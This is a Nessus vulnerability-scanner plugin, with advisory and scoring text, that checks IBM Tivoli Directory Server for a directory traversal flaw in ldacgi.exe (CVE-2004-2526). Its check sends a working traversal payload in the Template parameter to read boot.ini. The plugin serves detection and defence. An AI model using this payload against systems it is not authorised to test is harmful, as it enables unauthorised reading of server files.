Source: nessus | This script is Copyright (C) 2004-2021 Tenable Network Security, Inc. | TIVOLI_LDACGI_TRAVERSAL.NASL
History: Aug 02, 2004 - 12:00 a.m.

Tivoli Directory Server ldacgi.exe Template Parameter Traversal Arbitrary File Access

2004-08-02 00:00:00
This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.
www.tenable.com
39

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

EPSS

0.01

Percentile

84.0%

The remote host is running IBM Tivoli’s Directory Server, a lightweight LDAP server with a web frontend.

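There is a directory traversal issue in the web frontend of this program, specifically in the ‘Template’ parameter of the ‘ldacgi.exe’ CGI. An unauthenticated remote attacker may exploit this flaw to read arbitrary files on the remote system with the privileges of the web server. The solution listed in the plugin is to apply 3.2.2 Fix Pack 4 / 4.1 Fix Pack 3 or later.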

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin registration. This branch only declares metadata (identifiers,
# advisory text, scoring, scheduling hints) and then exits, so none of the
# network check further down runs while `description` is set.
if (description)
{
  # --- Identity and revision -------------------------------------------
  script_id(14191);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  # --- External references for the flaw --------------------------------
  script_cve_id("CVE-2004-2526");
  script_bugtraq_id(10841);

  # --- Human-readable titles -------------------------------------------
  script_name(english:"Tivoli Directory Server ldacgi.exe Template Parameter Traversal Arbitrary File Access");
  script_summary(english:"IBM Tivoli Directory Traversal");

  # --- Report text: synopsis, description, references, remediation -----
  script_set_attribute(attribute:"synopsis", value:"The remote web server is prone to a directory traversal attack.");
  script_set_attribute(attribute:"description", value:"The remote host is running IBM Tivoli's Directory Server, a
lightweight LDAP server with a web frontend. 

There is a directory traversal issue in the web frontend of this
program, specifically in the 'ldacgi.exe' CGI.  An attacker may
exploit this flaw to read arbitrary files on the remote system with
the privileges of the web server.");
  script_set_attribute(attribute:"see_also", value:"http://www.oliverkarow.de/research/IDS_directory_traversal.txt");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2004/Aug/29");
  script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg1IR53631");
  script_set_attribute(attribute:"solution", value:"Apply 3.2.2 Fix Pack 4 / 4.1 Fix Pack 3 or later.");

  # --- Scoring: network-reachable, no authentication, partial
  #     confidentiality impact only (read access, no write/DoS) ----------
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  # NOTE(review): "exploit_available" is "false" while the temporal vector
  # above carries E:POC and "exploited_by_nessus" below is "true"; the
  # values are kept as published - confirm which one is intended.
  script_set_attribute(attribute:"exploit_available", value:"false");

  # --- Dates, plugin type and affected product -------------------------
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/02");
  script_set_attribute(attribute:"vuln_publication_date", value:"2004/08/02");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_directory_server");
  # The check confirms the flaw by actually requesting a file through the
  # CGI (see the request below the registration block), hence this flag.
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # --- Scheduling: category, ownership, family, prerequisites ----------
  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  # Runs after HTTP service identification and only against web ports.
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);

  # Registration is complete; stop before the check code.
  exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Pick the web port to test; 80 is the fallback when no HTTP service was
# registered for the host.
port = get_http_port(default:80);

# One read-only GET to the CGI whose Template parameter points outside the
# template directory at boot.ini. For defenders, the same shape is what to
# look for in web logs: requests to ldacgi.exe whose Template value
# contains "../" sequences.
reply = http_send_recv3(
  method:"GET",
  port:port,
  item:"/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252"
);

# No response at all: report an error exit rather than a negative result.
if (isnull(reply))
  exit(1, "the web server did not answer");

# Join the three parts of the reply into one string so the marker is
# searched everywhere (presumably status line, headers and body - confirm
# against http.inc).
response_text = strcat(reply[0], reply[1], '\r\n', reply[2]);

# "[boot loader]" is the section header that opens a Windows boot.ini, so
# its presence means the file content was returned by the CGI.
# NOTE(review): when the marker is absent the script simply falls off the
# end with no "not affected" audit message.
if ("[boot loader]" >< response_text)
{
  security_warning(port);
  exit(0);
}
